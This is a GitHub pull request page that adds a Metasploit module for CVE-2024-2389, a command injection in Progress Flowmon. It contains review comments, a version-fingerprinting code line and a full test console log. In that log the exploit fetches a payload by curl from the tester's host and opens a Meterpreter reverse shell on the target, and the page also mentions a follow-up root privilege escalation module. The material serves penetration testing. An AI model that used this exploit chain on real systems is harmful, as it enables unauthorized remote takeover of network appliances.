New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add module for Flowmon cmd injection CVE-2024-2389 #19150
base: master
Are you sure you want to change the base?
Add module for Flowmon cmd injection CVE-2024-2389 #19150
Conversation
documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
Outdated
Show resolved
Hide resolved
end | ||
|
||
# Use a regular expression to extract the version number from the response | ||
version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)}) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Not a blocker: As a sanity question; is fingerprinting on homepage/auth/login
and having fav.ico?v=....
enough to uniquely identify the application as flowmon - or are there other checks we can add to have a more rigorous check
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I've added a check to ensure the following html appears on the login page:
<title>Flowmon Web Interface</title>
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the awesome module @DaveYesland. I pushed up a059700, hope you don't mind. I responded to the outstanding comments on the PR made a couple minor fixes. The PR is looking great and testing was as expected 👍
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > options
Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.2.26 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
sing-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI path to Flowmon
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME kCCuPRnPS no Name to use on remote system when storing payload; cannot contain spaces
or slashes
FETCH_SRVHOST 192.168.2.23 no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST 192.168.2.23 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.2.23:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.2.26:443 can be exploited!
[*] Detected version: 12.03.02
[+] Version 12.03.02 is vulnerable.
[+] The target is vulnerable.
[*] Attempting to execute payload...
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.26:34294) at 2024-05-23 13:12:55 -0400
meterpreter > getuid
Server username: flowmon
meterpreter > sysinfo
Computer : localhost.localdomain.localdomain
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
end | ||
|
||
# Use a regular expression to extract the version number from the response | ||
version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)}) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I've added a check to ensure the following html appears on the login page:
<title>Flowmon Web Interface</title>
This adds a module for:
CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection
For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
This application is avaiable in cloud marketplaces:
Verification Steps
use exploits/linux/http/progress_flowmon_unauth_cmd_injection
set RHOSTS <target flowmon>
set RPORT <port flowmon is running on>
set LHOST <your host IP>
run
flowmon
user.exploit/linux/local/progress_flowmon_sudo_privesc_2024
to gain root privileges.Scenarios
Flowmon 12.2